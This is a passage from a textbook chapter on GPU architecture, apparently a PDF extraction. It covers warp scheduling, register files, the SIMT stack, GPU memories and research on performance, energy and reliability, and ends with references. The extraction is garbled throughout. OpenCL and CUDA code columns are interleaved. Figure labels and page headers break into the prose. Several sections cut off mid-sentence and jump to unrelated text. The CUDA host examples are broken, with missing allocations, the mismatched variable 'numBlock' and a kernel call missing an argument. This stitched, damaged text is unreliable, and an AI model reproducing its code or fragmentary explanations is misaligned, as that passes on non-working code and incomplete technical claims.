mance bottleneck that is data access latency. Figure 4a shows a simplified SIMT
execution where a group of SIMT lanes (white lines in the computation box)
encounter a memory stall and resume the execution once the data arrive from the
memory. As all threads execute the same instruction each cycle, all threads within
the SIMT unit encounter memory stalls at the same time. Then, the threads stop
execution until when the data become ready. During that time, all shader cores
become idle. Because memory access latency is typically hundreds of cycles, the
performance overhead is significant. Therefore, another evolution was needed in
the thread scheduling. Figure 4b shows the group-level thread scheduling, where a
GPU runs a program with groups of threads and schedules each group in a certain
order. The example figure shows a round-robin scheduling where thread groups 1 to
3 take turns to run computations with time multiplexing. The thread group context
switching happens when each group encounters memory stalls. While one thread
group (e.g., group 1 in the figure) is waiting for their data, another ready group
(e.g., group 2) runs non-memory operations. If enough number of thread groups
are supported, the memory stall overhead can be completely hidden. This thread
groups are called warp in NVIDIA GPUs and wavefront in AMD GPUs. Warp
scheduling is handled by hardware schedulers that are called warp scheduler or
wavefront schedulers. The details of warp scheduling will be discussed in section
“Hardware Architecture.”
16 GPU Architecture 537
time
Computation Group 1 Group 2 Group 3
Runnable
(a) (b)
Fig. 4 GPU execution (a) without thread groups and (b) with batched processing in thread
groups
Kernel
Programming Interface
OpenCL CUDA
__kernel void vadd (__global const float *a, __global__ void vadd (float *a, float *b,
__global const float *b, float *result)
__global float *result) {
{ int id = blockIdx.x * blockDim.x +
int id = get_global_id (0); threadIdx.x;
result[id] = a[id] + b[id]; result[id] = a[id] + b[id];
} }
dimension, respectively. On the other hand, OpenCL provides a function that returns
the global ID, get_global_id(). The kernel function is defined with __global__ in
CUDA and HIP, and __kernel in OpenCL. Input and output parameters in CUDA
are allocated in global memory (which is the main memory attached in the GPU
card) by default and hence there is no need to specify the memory name in CUDA.
On the other hand, in OpenCL code, the function parameters need specifications,
__global to indicate that the parameters are allocated in global memory. Other than
that, the code for the vector addition is identical. Once a thread acquires its global
ID, the thread retrieves one element from each of the two input vectors with the
ID and adds them into an entry in the output vector. As all threads involved in this
GPU program run the same kernel code, N-element vector additions can be done in
parallel with N threads with only two code lines without any loop iterations.
GPUs can be integrated into a system either through PCI-E bus or on the same
processor package with the host CPU. If GPUs are connected through PCI-E bus,
GPUs typically have their dedicated memory. Therefore, input and output data need
to be explicitly sent from/to the CPU system memory. Also, the memory space for
these data is required to be allocated via GPU APIs. Code 2 shows the program that
is executed on the host CPU to run the vector addition function. In this example
code, 32-element arrays A and B are passed to the GPU kernel and added to an
output 32-element array C. The input arrays A and B are allocated in the GPU
memory with cudaMalloc and the array values are sent to the GPU via cudaMemcpy.
The kernel is invoked with a thread block of 32 threads, as defined in variables
numBlocks and numThreads. These thread and block information are passed to the
kernel between <<< and >>> marks. The pointers for the input and output data
are passed as regular CPU functions. Once the kernel is finished, the output data
needs to be copied back to the CPU system memory as can be seen in the last
line of the code. HIP-equivalent program can be written by replacing cudaMalloc
int main()
{ // executed on CPU
int A[32] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, … 31};
int B[32] = {9, 8, 7, 6, 5, 4, 3, 2, 1, 0, … 2};
int C[32] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, … 0};
int numBlocks = 1;
int numThreads = 32;
vadd <<<numBlock,numThreads>>>(g_A,g_B,g_C);
cudaMemcpy(C, g_C, 32 * sizeof(int),cudaMemcpyDeviceToHost);
}
with hipMalloc, cudaMemcpy with hipMemcpy, and the kernel invocation line
with hipLaunchKernel. As the focus of this chapter is not GPGPU programming,
descriptions for more APIs and compiler intrinsics are omitted. The readers can find
the up-to-date programming interfaces from CUDA programming guide (NVIDIA
2022) and HIP programming guide (AMD 2021).
Hardware Architecture
Shader Pipeline
Figure 7 illustrates the graphical view of GPU architecture with device memories
and the shader pipeline. Each SM consists of compute cores and memory that are
required for SIMT execution. Instructions are executed in warp unit where each
16 GPU Architecture 541
GPU
Warp Scheduler
SM SM SM ... SM Warp 1
Warp 2
...
Warp N
SIMT lane (thread) is executed on one of the shader cores (or SIMT execution units).
A simple in-order pipeline is used that consists of fetch, decode, issue, execute,
and writeback steps, as highlighted with green color. After the decode stage, the
decoded instructions are enqueued in an instruction buffer. The instructions are
marked as ready by a scoreboard logic if data hazards (e.g., read-after-write and
542 H. Jeon
Register File
A CPU normally has a small register file to maintain one or a handful of process
contexts. Thus, the register file size is typically up to several hundred bytes. Once
a process is scheduled out, context switching is happening by copying current
process’ register values in the register file to stack memory and moving the new
process’ register values from stack to the register file. This memory copy-based
context switching is used in CPUs because the size of data copy is only several
hundred bytes, which induces acceptable performance overhead. However, such
a memory copy-based context switching is not practical in GPUs because GPUs
run instructions in a warp unit, which consists of 32 threads. To make things
worse, the warp-level context switch happens every cycle to hide memory access
latency (details will be discussed in section “Warp Scheduler”). This means that
32-thread-worth register copy should be done every cycle, which will cause too
much performance overhead. Instead, GPUs employ a large register file that can
hold registers of tens of warps. With the large register file, warps can retrieve their
registers without any memory copy. In a P100 architecture shown in Fig. 6, each
SM has two 128 KB register files. The aggregated register file size in a P100 that
has 56 SMs is 14 MB. The register file space is flexibly utilized by active warps.
For example, a P100 architecture allows up to 255 registers per thread. As each
register file in an SM contains 32,768 32-bit registers (as noted in Fig. 6), up
to four warps can be supported when threads use all 255 registers (32,768 ≈ 32
threads/warp × 255 registers/thread × 4 warps). Or, if threads use only 32 registers
for a given kernel, up to 32 active warps can be supported.
To feed all threads in a warp in each cycle, GPUs employ a banked register file.
Figure 8 illustrates the banked register file. Each bank can feed multiple threads per
warp. For example, if a bank has 128-byte width, each entry of a bank can hold four
32-bit registers such as r1 for thread 0 to thread 3 of the same warp. In other words,
a warp accesses eight banks to retrieve r1s of all 32 threads in a cycle. Though each
register can be read in one cycle, each instruction typically consumes multiple cycles
to read all operands used by each instruction. Until when all operand values of an
instruction are collected, the retrieved registers are buffered in operand collector
unit. Each warp has up to three slots in the operand collector unit because GPU
instructions can use up to three operands. Each slot consists of 32 32-bit entries to
hold registers of all 32 threads in a warp. Once all operand values are retrieved, the
instruction is issued to the corresponding execution units.
16 GPU Architecture 543
Bank N-1
Bank 0
Bank 1
Bank 2
...
Crossbar
Operand Collector
Warp Scheduler
In GPU, instructions are executed in a warp unit. The threads in a warp execute
the same instruction every cycle in a lock-step manner by sharing PC values.
This warp-level execution enables batched processing of data intensive workloads.
However, as GPU uses in-order execution, once a warp encounters stalls due to data
hazards or structural hazards (e.g., bank conflicts in register file or shared memory
accesses), the warp should stop execution until the hazard is resolved. Therefore,
GPU schedules different warp every cycle. It is known that data hazard stalls can be
hidden with at least six warps. To select different ready warps each cycle, GPUs are
equipped with warp schedulers. The warp scheduler checks the availability of each
warp and selects one ready warp to issue an instruction. Round-robin is the baseline
scheduling algorithm that chooses warps based on the warp ID in either increasing
or decreasing order. Round-robin is a simple and fair scheduling algorithm, but it is
not effective to hide memory stall latency. As threads within a warp execute the same
instruction, once a memory load operation is executed, 32-thread-worth data should
be loaded from memory together, which takes several hundred cycles. To make
things worse, as warps run the same kernel code while scheduled interleavingly
in a round-robin scheduling, the neighboring warps are likely to execute the same
instruction. Therefore, once a warp encounters a memory stall, following a few
warps are likely to encounter the same memory stalls. This makes most of the warps
to stuck at memory stalls, which leads the compute cores to be idle for a long time.
To resolve the limitations of round-robin scheduler, several warp schedulers have
been proposed. One representative scheduler is two-level scheduler that is proposed
by NVIDIA researchers (Gebhart et al. 2011). The two-level scheduler uses two
warp queues, one is for ready warps and another for pending warps. Only a small
number of ready warps are enqueued in the ready queue and the remaining ready
warps and the warps stuck at memory stalls are enqueued to the pending queue. Each
cycle, the warp scheduler chooses one in the ready queue in round-robin fashion.
Once a warp in the ready queue encounters a memory stall, the warp is moved to the
pending queue and one ready warp in the pending queue is enqueued to the ready
queue. By running a small group of warps before the other warps, the two-level
544 H. Jeon
SIMT Stack
Threads in a warp execute the same instruction every cycle, by sharing a program
counter (PC) value. For non-branch operations, this warp-level execution is easy to
handle. Every cycle, warp PC value is incremented together and proceed to the next
line of code. But for the control branches, threads in a warp may need to execute
different diverged flows. For example, for an if-else statement in Fig. 9, the even
numbered threads should execute the if clause while the odd numbered threads must
execute the else clause.
In this case, GPUs do not have capability to execute both if and else clauses
in parallel because threads in a warp share the same PC value. Instead, each warp
traverses both clauses sequentially. To allow threads to execute the correct diverged
flow only (either if or else clause in this example), GPU uses active mask. An active
mask is a 32-bit vector that indicates the activeness of individual threads in a warp.
If a thread has a value “1” in its entry in the active mask, the thread can execute an
instruction. If otherwise, the thread skips execution that cycle. In Fig. 9, the right-
hand-side flow graph shows the active mask of each path. The if statement (①) is
executed by all 32 threads, so the active mask has all 1’s. The if clause (②) is entered
by even numbered threads so the active mask has 1’s for every other bit from the
first bit (bits 0, 2, 4, . . . ). Likely else clause (③) has 1’s for every other bit from
the second bit (bits 1, 3, 5, . . . ). At the end of the if-else statement (④), the threads
converge again so the active mask is fully filled with 32 1’s.
The active mask value is updated every cycle to enforce correct execution.
To enable threads in a warp to execute all diverged flows and converge at their
immediate post-dominator reconvergence point, GPU employs a SIMT stack.
c if (threadId.x % 2 == 0) { c(1111…1)
d // executed by even numbered
// threads (thread 0, 2, 4, …, 30)
e } else {
// executed by odd numbered d(1010…0) e(0101…1)
f // threads (thread 1, 3, 5, …, 31)
}
... // reconvergence point
f(1111…1)
Fig. 9 A diverged flow example (left) and active masks per path (right)
16 GPU Architecture 545
c
Top Of Stack (TOS)
d
TOS e
Execution flow
TOS
f
TOS
Fig. 10 SIMT stack value transition for the diverged flow example in Fig. 9
A SIMT stack keeps track of the next PC value with the corresponding active mask,
as shown in Fig. 10. Once a warp encounters a control branch, the stack grows
by as many entries as the number of diverged flows. Each entry has the PC value
associated to the diverged flow and the PC value of the reconvergence point. The
reconvergence point is the address of the instruction that is the immediate post-
dominator (PDOM) of the diverged flows. For example, line ④ is the PDOM of
the paths ② and ③ in Fig. 9. If each diverged flow has nested diverged flows, the
stack grows further so that all paths can be explored properly. Figure 10 shows the
SIMT stack operations while traversing diverged flows ② and ③ sequentially. Once
① find two flows, the stack is grown to hold the two paths as shown with ②. The
top of stack (TOS) points to the instructions of path ②. The paths of another flow ③
and the converging point ④ are stacked above them to be executed in the following
cycles. After finishing the execution of path ②, the stack is shortened, and TOS
points the path of ③. Finally, when the path ③ finishes and the next PC is reaching
to that of ④, the stack size is reduced to one entry, which means that there is no
more divergence.
Memories
Unlike a CPU that typically uses a large system memory and multilevel caches, a
GPU is equipped with several different types of memories where some of them can
be accessed with special software APIs and compiler intrinsics.
Figure 7 shows the memory structures of GPU architecture. The following
subsections will explain each of the memories.
Global Memory
The GPU-side main memory is called global memory. Global memory is the largest
read-write region in the GPU device memory and is accessible by the host CPU to
send input data and receive output data of a GPU kernel function. The host CPU
can use cudaMalloc and cudaMemcpy APIs to allocate variables and send/receive
546 H. Jeon
Shared Memory
Shared memory is an on-chip SRAM memory. One shared memory is utilized by
all thread blocks assigned to the same SM. As inter-thread block communication
is not supported, shared memory is also logically partitioned for each thread block.
Therefore, GPU compiler (e.g., nvcc) checks the aggregated shared memory usage
of all thread blocks that are going to be assigned to each SM and generates
a compile error if the usage exceeds the shared memory size in an SM. The
shared memory is similar to scratch memory in CPU, which is a programmer-
controllable on-chip memory. The data stored in shared memory can be accessed
with similar latency to L1 cache, while being kept in the shared memory throughout
the application’s execution time without concern about eviction, unlike L1 cache.
With this performance advantage, allocating proper variables in the shared memory
is one of the most important performance optimizations in GPU programming. To
allocate data in the shared memory, a qualifier __shared__ should be used. To assign
values to the variables defined in the shared memory, regular store operations can be
used. For example, to load input data to the shared memory, the input data should be
loaded from the global memory to registers and then stored to the shared memory.
Similar to the register file, shared memory uses a banked structure. For example,
16 GPU Architecture 547
the shared memory in an NVIDIA Maxwell architecture has 32 banks, where each
bank has 4-byte width. If all threads in a warp access different bank, all data will
be retrieved in one shared memory access latency (which is around five cycles). If
any threads access the same bank but for different data words, there will be a bank
conflict and the conflicted accesses will be sequentially executed. Therefore, the
shared memory accesses should be carefully designed by the programmer.
L1 and L2 Caches
GPUs typically use two-level cache hierarchy. Each SM has an on-chip L1 cache.
In a GPU device, there is a shared L2 cache. L2 cache is connected to the SMs
through an interconnection network. Therefore, access latency to L2 is normally
much longer than the L1 cache access time (which is around five cycles). Accesses
to the global memory is cached in L1 and L2 caches. Unlike CPUs where L1
caches are activated by default, GPU L1 caches can be configured for activation.
Programmers can enable L1 cache for a program with a compiler option at compile
time. Once L1 is disabled, global memory accesses are directly forwarded to L2, and
the L1’s physical SRAM space is used for either shared memory or texture cache
depending on the GPU architecture configuration.
There can be multiple reasons to disable L1 cache. The two main reasons area the
unique characteristics of GPU applications and efficient cache coherence support.
Though GPUs are also used for general-purpose applications, the dominant GPU
applications are graphics applications. In a graphics application, data locality and
reuse rate are much lower than general-purpose applications. Note that in image
processing, the pixel values are read, processed, and then stored to the output
framebuffer. In this course of processing, the same values are not likely to be
repeatedly read. Therefore, L1 cache does not help for performance improvement.
Regarding cache coherence, GPUs barely support L1-cache level coherence because
thread blocks are regarded to be independent. This means that there is no need
to enforce coherent data accesses. But, if an algorithm requires some data sharing
across thread blocks (that run on different SMs), the shared L2 is used for coherent
data sharing. In this case, the updated data should be flushed to L2 so that all the
other SMs can see the up-to-date data. This GPU’s two-level coherence is called
scoped coherence (Hower et al. 2014). If the coherence scope is thread block,
threads within the thread block are guaranteed to see the updates made within the
thread block, which matches the first case that there is no need to have coherence
across L1 caches. If the coherence scope is GPU device, the coherent accesses are
forced through cache flushes to L2, which is the second case that all L1 updates are
flushed to L2. When GPU-scoped coherence is used, L1 can be disabled because L1
will be bypassed anyways.
#define WIDTH 32
void MatrixMul(float* A, float* B, float* C)
{
for (i = 0; i < WIDTH; i++)
for (j = 0; j < WIDTH; j++)
for (k = 0; k < WIDTH; k++)
C[i * WIDTH + j] += A[i * WIDTH + k] * B[k * WIDTH + j];
}
(a)
int main()
{
...
float *g_A, *g_B, *g_C;
cudaMalloc((void**)&g_A, WIDTH*WIDTH * sizeof(int));
cudaMalloc((void**)&g_B, WIDTH*WIDTH * sizeof(int));
cudaMalloc((void**)&g_C, WIDTH*WIDTH * sizeof(int));
are allocated in the global memory. Each thread computes one output matrix element
by multiplying one row of A matrix and a column of B matrix.
Let us check the access patterns to these matrixes to find the best memory to
map them. The WIDTH value is 32. The kernel is executed by a thread group of
32 × 32 threads. According to the row and the column calculations in the kernel,
the 32 continuous threads in each warp use the same row value and consecutive
column values. In the A matrix index calculation (A[row * WIDTH + k]), row
is the only thread-dependent variable. As the threads within a warp use the same
row value, each warp accesses the same A matrix element every cycle. Therefore,
a memory that is cacheable and can broadcast one value to all threads in a warp
is proper for the matrix A, which is the constant memory. On the other hand,
regarding B matrix index calculation (B[k * WIDTH + col]), all threads in
a warp access different elements in the same row. Therefore, constant memory
is not proper. A memory that allows parallel accesses such as banked memory
structure is proper. The shared memory is a fast on-chip memory that has banked
structure. Therefore, shared memory can well support the matrix B accesses. Finally,
regarding the C matrix, each element in C matrix is independently calculated by one
thread. This means that threads can use a fast private memory for the computation.
16 GPU Architecture 549
MatrixMul <<<numBlock,numThreads>>>(g_B,g_C);
...
}
Only when all the computations are finished, the result can be updated to the
shared C matrix which is in the global memory. Therefore, the register file, which
is the fastest private memory space in GPU architecture, is optimal for matrix C
computation.
Code 4 shows the optimized CUDA code. The A matrix is defined as a
global variable with a qualifier __constant__ as shown in line ①. Then, an API,
cudaMemcpyToSymbol() is used to copy matrix contents from CPU system memory
to the constant memory (⑨). As the matrix A is defined as a global variable, the
matrix A does not need to be passed as an input parameter (②). To define B matrix
in the shared memory, a qualifier __shared__ is used in the kernel (④). As shared
memory is not directly accessible by the host CPU, the matrix B is initially copied to
the GPU global memory. Then, the matrix contents should be copied from the global
memory to the shared memory (⑤). The line ⑤ makes all threads to collaboratively
load matrix contents from the global memory to the shared memory, one element
per thread. To wait until all threads to finish data copy, a synchronization function,
__syncthreads(), is called (⑥). To maintain the intermediate computation result of
each thread in a register, a local variable is defined (③). If a variable is defined in
a kernel, each thread has one register entry for that variable. ⑦ shows the matrix
multiplication, where each thread multiples a row of A matrix with a column of B
matrix. The computation result is collaboratively copied to the output matrix, C in
the global memory, one element per thread (⑧).
550 H. Jeon
Performance
GPGPU performance has been ever increasing since released in mid-2000s thanks
to the significant efforts made by both academia and industry. In this subsection, a
few selected research will be introduced that tackled memory access latency, which
is one of the most critical performance bottlenecks in GPU computing.
tion time imbalance across warps and improve performance by allocating more time
resources to the warps in starvation. To identify critical warp, a criticality prediction
logic monitors the execution progress of individual warps by integrating one
criticality counter per warp. The criticality counter is updated by using instruction
count disparity caused by diverged flows and the stall latencies caused by shared
resource contentions.
Some other studies aimed at finding a warp scheduling algorithm that can
improve the effectiveness of memory prefetch. Jog et al. (2013) presented a prefetch-
aware warp scheduling policy. They observed that the simple next-line prefetcher
cannot improve performance as expected under two-level or round-robin warp
schedulers because the warps that use the prefetched next line is likely to be
scheduled in the immediate-following scheduling cycle. Note that warps in a thread
group typically access consecutive memory addresses and hence the next cache
line prefetched by a warp is consumed by an immediate-following warp. Because
immediate-following warp is scheduled one scheduling cycle later than the warp
that issued a prefetch, the prefetched data are likely to arrive too late. To place
an enough time gap between prefetch and the data access, the scheduler forms fetch
groups with nonconsecutive warps. By scheduling the warps in the same fetch group
in the consecutive time windows and having the warps in the group issue prefetch
for another fetch group, prefetch can be issued way ahead of time than the actual
accesses.
underutilized register file space as a victim cache. Once a data in the victim cache is
accessed again, the data can be quickly copied to the accessed instructions inside the
register file. To improve the opportunities to spare victim cache space in the register
file, they apply CPU-like thread group context switching, where the register values
of an inactive thread group is copied to the off-chip memory. Using register space
as a victim cache can have better performance than the conventional victim cache
because data can be moved via an intra-register file copy when reused.
Some studies reduced memory traffic by increasing the opportunities of intra-
register data sharing. The following two studies exploited unique computation
patterns of deep learning workloads for intra-register data sharing. Jeon et al.
(2019) observed high data sharing opportunities among neighboring neurons in the
convolution operations in the convolutional neural network (CNN). The proposed
perfect sharing and partial sharing enable the neurons to access data from register
file if the data are fetched by neighboring neurons already, instead of redundant
memory accesses. To enable zero-copy register-level data sharing, they proposed
to simply rename the physical register pointer with the architected register of the
requesting neuron (thread). Kim et al. (2020) similarly exploited high data locality
in convolution operations with register-level data sharing. They track the history of
memory accesses to find the existence of a data in the register file. Once data is
located in the register file, they map the data to the requested warp by using register
renaming. Their design accommodates the unique access patterns made by CUDA
Tensor Core operations.
A recent study proposed to make the L1 caches as a shared resource for multiple
SMs. Ibrahim et al. (2021) observed that local L1 caches are not efficiently utilized
because data that are commonly used by thread blocks are redundantly loaded
to multiple L1 caches. Also, the bandwidth imbalance between local L1 and the
common L2 is significant. To resolve these problems, they designed L1 caches to be
decoupled to SMs and interfaced with the SMs via interconnect network. Depending
on the access patterns, the connections are aggregated or private. They explored
performance impacts of various mapping configurations.
Energy Efficiency
GPUs show better energy efficiency (in FLOPs per watts) than CPUs because
GPUs can achieve better throughput per watt with massive parallelism even without
using fancy architecture components such as complex branch predictor, out-of-order
execution, and cache coherence protocols, unlike CPUs. However, due to abundant
computing resources that enable massive parallelism (e.g., hundreds of compute
cores and megabytes of register file), the overall power consumption increases
rapidly for each new GPU generation. With the increasing power consumption,
it is hard to integrate more computing logics that are essential for improving
performance. Thus, the power overhead will eventually slow down the performance
improvement of GPUs. There have been extensive efforts from both academia
and industry to improve GPU energy efficiency. Figure 11 shows architecture
16 GPU Architecture 553
Exe,
Constant, 20.10%
11.20%
Some studies exploited the inherent similarity in operand values and instructions
to save power. Wong et al. (2016) leveraged the operand value similarity to reduce
energy consumption. Namely warp approximation, the proposed method detects
value similarity in the operands and makes one representative SIMT lane to execute
instructions and the corresponding register accesses on behalf of multiple lanes that
use similar operands. By providing a programming interface that enables program-
mers to annotate the regions of code that can safely run warp approximation, the
warp approximation improves GPU energy efficiency by 26% with negligible final
output errors.
Kim and Ro (2018) observed that there are quite a few identical warp-level
instructions across thread blocks. While threads in a warp may use similar but not
identical operand values, if one goes upper level to an inter-warp level, there are
a few warps that use exactly the same operands because thread blocks execute
the same kernel code and thread id is repeated across thread blocks. Such a
redundant warp execution may lead to energy overhead. Thus, the authors proposed
to reuse warp instruction and the corresponding registers. By eliminating redundant
executions, dynamic power was effectively reduced. The register reuse also saves
register usage by mapping one physical register for multiple architected registers.
the live registers, thereby running most of the GPU workloads with a 50% smaller
register file without performance degradation. By cutting the register file by half,
the register file virtualization effectively reduces GPU static and dynamic power
consumption. They also designed a scheduling algorithm to avoid deadlock situation
due to limited register resource for large workloads.
Lee et al. (2015) tackled the register file energy efficiency by shrinking the space
requirement of each warp-level register. They observed that GPU workloads have
inherent value similarity among threads within a warp. For example, if a warp
explores an array, threads in that warp are typically assigned to access consecutive
elements. Therefore, neighboring threads typically use consecutive array index
values, where the value distance between adjacent threads is only 1. The authors
pointed that storing these continuous values to 32 separate register entries is waste
of register space. Instead, they integrate a simple base-delta-immediate compression
where the first thread of a warp stores a base value in a 32-bit register entry while
the remaining 31 threads store only the distance values. This way, the warp-level
register space is effectively shrunk up to 2 bytes. The compressed register values
are maintained in fewer register banks than the uncompressed ones. The register file
compression reduces both dynamic and static power of a register file by reducing
the number of register bank accesses and enabling the opportunistic power gating
on the empty register banks.
Lee et al. (2017) extended the register file compression to support compressed
execution. By leveraging the adder and subtractor logics used by the operand
decompressor, they allow uncompressed data additions and subtractions to be done
inside the register file. The compressed execution can bypass the execution stage,
thereby saving execution unit power consumption.
Esfeden et al. (2019) further increased the register file utilization efficiency by
squeezing multiple narrow-width register values into one register entry. The authors
observed that a significant amount of register values in GPU computing falls into
one to two byes only. To reduce the register bandwidth for retrieving unnecessary
bits, they combine multiple architected registers of a warp into one register entry. To
avoid potential register bank conflicts caused by the register packing, they applied
graph coloring algorithm for finding a pair of registers to be packed. The registers
that are commonly used by the same instruction are packed together. This way,
the register bandwidth can be even further reduced because two operands of an
instruction can be read by one register entry access. With the operand coalescing
and packing, both register file usage and accesses are reduced, which lead to
improvements of register file power efficiency and overall performance.
Reliability
With Moore’s Law, transistor size is decreased to even a several nanometer scale
today. Though the small transistor size helps integrate more cores and fancy micro-
architecture components on the integrated circuits, it also increases vulnerability
to various hardware errors. Most of permanent errors (e.g., stuck-at-zero) can be
556 H. Jeon
screened at the testing steps in the fabrication process. However, soft errors that are
caused by particle strikes coming from cosmic ray or processor packages cannot
be completely filtered. Also, the denser the transistors are integrated, the more
transistors can be struck by one soft error. Thus, the concerns for multi-bit flips are
increasing. The non-general-purpose GPUs have not integrated reliability supports
because graphics applications are inherently error prone. Note that one to two pixel
errors in an image are acceptable if those are not perceivable by human eyes. But, as
GPUs are used for general-purpose applications, a few bit flips may lead to a critical
computation error. There have been a few studies that try to detect and correct errors
occurring in various architecture components in GPUs.
Fault Analysis
The aforementioned studies aimed at detecting and correcting any errors occurred in
the computations regardless the actual location of the error. This is called as coarse-
grained error coverage. Some other studies examined vulnerability in finer-grained
level, such as each logic-gate level, register bit-level, or pipeline stage-level. The
finer-grained vulnerability studies use fault injection methods. They pick a few fault
sites in either some architecture components or data, inject errors to the fault sites
(e.g., flips bits), and check the total number of corruptions and detected errors from
an application execution. Nie et al. (2018) examined the necessary fault sites to
inject errors to evaluate overall vulnerability in GPU computing. They observed
that the abundant resources and massive parallelism of GPU computing require
huge number of fault sites which is almost impractical to run without a significant
performance overhead. To reduce the overhead, they leveraged inherent computation
redundancies among threads, warps, and thread blocks in GPU computing. If there
are any redundant (even when the operands are not exactly matching) control flows,
they add faults only to some representative executions. For example, if there is a
warp divergence, errors are injected to only one thread’s execution per diverged
flow. Likely, some representative loop iterations for a whole loop execution and a
few bits among all bits in each data that are more vulnerable to errors are identified
as fault sites. With such a significant fault site reduction, they achieved similar
error coverage with non-pruned approach, with significantly less effort for fault
injection.
Conclusion
This chapter describes basic concepts and design details of GPU architecture. The
focus of this chapter is to help readers to understand the reasons behind the high
throughput of GPU computing. As GPU architecture and programming interfaces
are quickly evolving, this chapter explores the core architecture components and the
interfaces, with which the readers can easily catch up on the advanced features and
latest updates of GPU architectures.
References
Abdel-Majeed M, Dweik W, Jeon H, Annavaram M (2015) Warped-RE: low-cost error detection
and correction in GPUs. In: Proceedings of the 45th annual IEEE/IFIP international conference
on dependable systems and networks, 2015 June 22–25, Rio de Janeiro, Brazil
558 H. Jeon
Abdel-Majeed M, Shafaei A, Jeon H, Pedram M, Annavaram M (2017) Pilot register file: energy
efficient partitioned register file for GPUs. In: Proceedings of the IEEE international symposium
on High performance computer architecture (HPCA), 2017 Feb 4–8, Austin, TX, USA
Alverson R, Callahan D, Cummings D, Koblenz B, Porterfield A, Smith B (1990) The tera
computer system. In: ACM SIGARCH computer architecture news, 1990 Sept, vol 18(3b), pp
1–6
AMD (2021) AMD HIP programming guide v1.0. [Internet]. Available from: https://github.com/
RadeonOpenCompute/ROCm/blob/master/AMD_HIP_Programming_Guide.pdf
Esfeden HA, Khorasani F, Jeon H, Wong D, Abu-Ghazaleh NB (2019) CORF: Coalescing Operand
Register File for GPUs. In: international conference on architectural support for programming
languages and operating systems, April 2019, Providence, RI
Gebhart M, Keckler SW, Dally WJ (2011) A compile-time managed multi-level register file
hierarchy. In: Proceedings of the 45th annual IEEE/ACM international symposium on microar-
chitecture (MICRO), 2011 Dec 3–7, Porto Alegre Brazil
Hower DR, Hechtman BA, Beckmann BM, Gaster BR, Hill MD, Reinhardt SK, Wood DA (2014)
Heterogeneous-race-free memory models. In: Proceedings of the international conference on
architectural support for programming languages and operating systems (ASPLOS), Mar 1–5
2014, Salt Lake City, Utah, USA
Ibrahim MA, Kayiran O, Eckert Y, Loh GH, Jog A (2021) Analyzing and leveraging decoupled
L1 caches in GPUs. In: Proceedings of the IEEE international symposium on high-performance
computer architecture (HPCA), Feb 27–Mar 3 2021, Seoul, Korea
Jeon H, Annavaram M (2012) Warped-DMR: light-weight error detection for GPGPU. In:
Proceedings of the 45th annual IEEE/ACM international symposium on microarchitecture
(MICRO), 2012 Dec 1–5, Vancouver, BC, Canada
Jeon H, Ravi GS, Kim NS, Annavaram M (2015) GPU register file virtualization. In: Proceedings
of the 48th annual IEEE/ACM international symposium on microarchitecture (MICRO), 2015
Dec 5–9, Waikiki, HI, USA
Jeon H, Esfeden HA, Abu-Ghazaleh NB, Wong D, Elango S (2019) Locality-aware GPU register
file. IEEE Comput Archit Lett 18(2):153–156
Jog A, Kayiran O, Mishra AK, Kandemir MT, Mutlu O, Iyer R, Das CR (2013) Orchestrated
scheduling and prefetching for GPGPUs. In: Proceedings of the 40th annual international
symposium on computer architecture (ISCA), 2013 June 23, Tel Aviv, Israel
Kim K, Wo RW (2018) WIR: warp instruction reuse to minimize repeated computations in
GPUs. In: Proceedings of the IEEE international symposium on High Performance Computer
Architecture (HPCA), 2018 Feb 24–28, Vienna, Austria
Kim K, Lee S, Yoon MK, Koo G, Ro WW, Annavaram M (2016) Warped-preexecution: a GPU
pre-execution approach for improving latency hiding. In: Proceedings of the IEEE international
symposium on high performance computer architecture (HPCA), 2016 Mar 12–16, Barcelona,
Spain
Kim H, Ahn S, Oh Y, Bo K, Ro WW, Song W (2020) Duplo: lifting redundant memory accesses
of deep neural networks for GPU tensor cores. In: Proceedings of the 53rd annual IEEE/ACM
international symposium on microarchitecture (MICRO), 2020 Oct 17–21, Athens, Greece
Koo G, Oh Y, Ro WW, Annavaram M (2017) Access pattern-aware cache management for
improving data utilization in GPU. In: Proceedings of the ACM/IEEE 44th annual international
symposium on computer architecture (ISCA), 2017 June 24–28, Toronto, ON, Canada
Lai J, Seznec A (2013) Performance upper bound analysis and optimization of SGEMM on Fermi
and Kepler GPUs. In: Proceedings of the 2013 IEEE/ACM international symposium on code
generation and optimization (CGO), 2013 Feb 23, pp 1–10
Lee S, Kim K, Koo G, Jeon H, Ro WW, Annavaram M (2015) Warped-compression: enabling
power efficient GPUs through register compression. In: Proceedings of the ACM/IEEE 42nd
annual international symposium on computer architecture (ISCA), 2015 June 13–17, Portland,
OR, USA
16 GPU Architecture 559
Lee S, Arunkumar A, Wu C (2015b) CAWA: coordinated warp scheduling and cache prioritization
for critical warp acceleration of GPGPU workloads. In: Proceedings of the ACM/IEEE 42nd
annual international symposium on computer architecture (ISCA), 2015 June 13–17, Portland,
OR, USA
Lee S, Kim K, Koo G, Jeon H, Annavaram M, Ro WW (2017) Improving energy efficiency of
GPUs through data compression and compressed execution. IEEE Trans Comp 66(5):834–847
Nie B, Yang L, Jog A, Smirni E (2018) Fault site pruning for practical reliability analysis of
GPGPU applications. In: Proceedings of the 51st international symposium on microarchitecture
(MICRO), 2018 Oct 20–24, Fukuoka, Japan
NVIDIA (2012) NVIDIA Geforce GTX 680 white paper v1.0. [Internet]. Available from:
https://www.nvidia.com/content/PDF/product-specifications/GeForce_GTX_680_Whitepaper_
FINAL.pdf
NVIDIA (2016) NVIDIA Tesla P100 white paper v1.1. [Internet]. Available from: https://images.
nvidia.com/content/pdf/tesla/whitepaper/pascal-architecture-whitepaper.pdf
NVIDIA (2022) CUDA C++ Programming Guide v11.6. [Internet]. Available from: https://docs.
nvidia.com/cuda/pdf/CUDA_C_Programming_Guide.pdf
Oh Y, Koo G, Annavaram M, Ro WW (2019) Linebacker: preserving victim cache lines in idle
register files of GPUs. In: Proceedings of the ACM/IEEE 46th annual international symposium
on computer architecture (ISCA), 2019 June 22–26, Phoenix, AZ, USA
Pattnaik A, Tang X, Kayiran O, Jog A, Mishra A, Kandemir MT, Sivasubramaniam A, Das CR
(2019) Opportunistic computing in GPU architectures. In: Proceedings of the 46th international
symposium on computer architecture (ISCA), 2019 June 22, Phoenix, Arizona
